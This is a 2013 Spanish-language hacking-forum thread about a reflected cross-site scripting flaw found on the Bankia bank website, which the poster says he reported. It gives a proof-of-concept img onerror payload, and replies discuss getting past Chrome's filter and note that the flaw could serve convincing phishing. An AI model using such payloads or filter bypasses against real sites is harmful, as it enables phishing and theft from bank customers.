comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS en Bankia

  • 5 Respuestas
  • 2069 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« en: Junio 06, 2013, 06:48:38 pm »
URL: No tienes permisos para ver links. Registrate o Entra con tu cuenta
PATH: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Vector: "><img src=x onerror=prompt(/Prophet/);>
Imagen: No tienes permisos para ver links. Registrate o Entra con tu cuenta



Reportada.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado Karcrack

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
  • Se siente observado ¬¬'
    • Ver Perfil
« Respuesta #1 en: Junio 06, 2013, 07:14:49 pm »
Como era de esperar Chrome lo filtra
I code for $$$.

(PGP ID 0xCC050E77)
ASM, C, C++, VB6... skilled [malware] developer

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #2 en: Junio 06, 2013, 07:20:45 pm »
Chrome los filtra casi todos bro, de todas maneras eso no hace que la xss sea menos grave y menos tratandose de un banco
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #3 en: Junio 06, 2013, 07:36:10 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Como era de esperar Chrome lo filtra
Si quieres mañana hago que funcione en Chrome
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
« Respuesta #4 en: Junio 06, 2013, 08:39:19 pm »
Ahí está funcionando en Chromium actualizado.

No tienes permisos para ver links. Registrate o Entra con tu cuenta
URL: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Saludos.
Contacto: @migueljimeno96 -

Desconectado Karcrack

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
  • Se siente observado ¬¬'
    • Ver Perfil
« Respuesta #5 en: Junio 07, 2013, 11:05:45 am »
@Jimeno: La versión de Windows lo filtra :-\

@Sanko: Sí, es gravísimo. Podrían hacer un phising de calidad. Saldría hasta el escudito que todo el mundo busca jaja
I code for $$$.

(PGP ID 0xCC050E77)
ASM, C, C++, VB6... skilled [malware] developer

 

¿Te gustó el post? COMPARTILO!